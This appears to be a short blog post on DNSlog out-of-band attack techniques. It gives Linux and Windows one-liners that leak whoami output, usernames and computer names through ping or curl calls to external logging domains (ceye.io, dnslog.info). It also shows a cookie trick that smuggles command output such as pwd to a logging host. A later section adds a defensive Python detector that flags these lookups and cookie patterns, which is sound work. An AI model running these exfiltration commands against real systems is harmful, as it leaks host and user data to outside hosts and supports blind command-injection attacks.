
Some DNSlog attack techniques

June 3, 2016 • Security

Command execution

Linux:
curl http://ip.port.domain.ceye.io/`whoami`
ping `whoami`.ip.port.domain.ceye.io
Windows:
ping %USERNAME%.domain.ceye.io

[Screenshot: dnslog1.png]

[Screenshot: dnslog2.png]

Linux

curl `whoami`.xxxxxx.dnslog.info

Windows

For example, using whoami:

Get the computer name:

for /F "delims=\" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.info

Get the user name:

for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.info

OR

for /F %x in ('whoami') do start http://cmd.xxxxx.dnslog.info/[%x].jpg

三个白帽

The cloudeye documentation says that to prove a command executed you generally ping or curl the ccxxxx.dnslog.info domain; the DNS and Apache logs then record the request, which proves the command ran but returns no output. After thinking it over, I found a way to get command output echoed back through cloudeye; see below.

Start any Linux environment (结界) on 三个白帽:

curl -b cookie=admin ccxxxx.dnslog.info

Create the cookie file:

echo -e "ccxxxx.dnslog.info\tFALSE\t/\tFALSE\t1450450776\tusername\tadmin" > cookies.txt

Execute a system command and append its result to cookies.txt:

pwd | tee -a cookies.txt

Collapse the echoed content into a single line:

paste -s -d ":" cookies.txt | tee cookies.txt

The log then records the echoed content in the cookie:

curl -b cookies.txt cc6020.dnslog.info
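Both channels described above (hostnames or user names smuggled into DNS labels, and command output smuggled into a Cookie header) leave traces in logs a defender already has. The following is an added example, not code from the original post or from cloudeye/三个白帽: it scans constructed BIND-style DNS query-log lines for lookups under the out-of-band logging domains named on this page (ceye.io, dnslog.info) and for data-like labels, and it checks a Cookie header for the kind of path-shaped value the cookie trick produces. The log lines, entropy threshold, and label-length thresholds are assumptions chosen for illustration.

```python
"""Spot DNSlog-style out-of-band beacons in DNS logs and HTTP cookies.

Added example (not from the original post). Sample log lines are
constructed; thresholds are assumptions.
"""
import math
import re
from collections import Counter

# Public out-of-band DNS/HTTP logging services mentioned on the page.
# Assumption: any internal lookup under them is worth an alert.
OOB_DOMAINS = ("ceye.io", "dnslog.info")

# Constructed sample lines in a BIND-style query-log layout.
SAMPLE_LOG = """\
03-Jun-2016 10:15:01.123 queries: info: client 10.0.0.5#53211: query: www.example.com IN A + (10.0.0.2)
03-Jun-2016 10:15:02.456 queries: info: client 10.0.0.5#53212: query: root.ip.port.domain.ceye.io IN A + (10.0.0.2)
03-Jun-2016 10:15:03.789 queries: info: client 10.0.0.7#53213: query: WIN-7TEST.xxx.dnslog.info IN A + (10.0.0.2)
03-Jun-2016 10:15:04.000 queries: info: client 10.0.0.7#53214: query: cmd.xxxxx.dnslog.info IN A + (10.0.0.2)
03-Jun-2016 10:15:05.000 queries: info: client 10.0.0.9#53215: query: 4a6f686e446f65.internal.example.net IN A + (10.0.0.2)
03-Jun-2016 10:15:06.000 queries: info: client 10.0.0.5#53216: query: mail.example.com IN MX + (10.0.0.2)
"""

QUERY_RE = re.compile(
    r"client (?P<client>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\S+)"
)


def shannon_entropy(s: str) -> float:
    """Bits per character; random-looking exfil blobs score high."""
    n = len(s)
    counts = Counter(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def classify(qname: str) -> list:
    """Return the reasons a query name looks like an out-of-band beacon."""
    reasons = []
    low = qname.lower().rstrip(".")
    if any(low == d or low.endswith("." + d) for d in OOB_DOMAINS):
        reasons.append("oob-dns-service")
    first = low.split(".")[0]
    # Exfiltrated data tends to sit in the leftmost label as hex/base64 blobs.
    if len(first) >= 12 and re.fullmatch(r"[0-9a-f]+", first):
        reasons.append("hex-label")
    if len(first) >= 16 and shannon_entropy(first) > 3.5:  # assumed threshold
        reasons.append("high-entropy-label")
    return reasons


def scan(log_text: str) -> list:
    """Return (client, qname, reasons) for every suspicious query line."""
    alerts = []
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue
        reasons = classify(m["qname"])
        if reasons:
            alerts.append((m["client"], m["qname"], reasons))
    return alerts


def suspicious_cookie(cookie_header: str) -> list:
    """Flag Cookie values shaped like command output (e.g. 'admin:/root')."""
    reasons = []
    for pair in cookie_header.split(";"):
        _, _, value = pair.strip().partition("=")
        if re.search(r"/[A-Za-z0-9_.-]+", value):
            reasons.append("path-in-value")
        if len(value) > 256:  # assumed threshold for a session token
            reasons.append("oversized-value")
    return reasons


if __name__ == "__main__":
    for client, qname, reasons in scan(SAMPLE_LOG):
        print(f"{client} -> {qname}: {', '.join(reasons)}")
    print(suspicious_cookie("username=admin:/root"))
```

Run against real BIND or Windows DNS debug logs the regex needs adjusting to the local format, and the domain list should be extended with whichever DNS-logging services your threat intelligence tracks; the cookie check belongs at a forward proxy or WAF where outbound Cookie headers are visible.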

Injection

http://blog.csdn.net/niexinming/article/details/50001367
http://docs.hackinglab.cn/HawkEye-Log-Dns-Sqli.html
http://byd.dropsec.xyz/2016/12/04/dnslog%E5%88%A9%E7%94%A8/

Tags: dnslog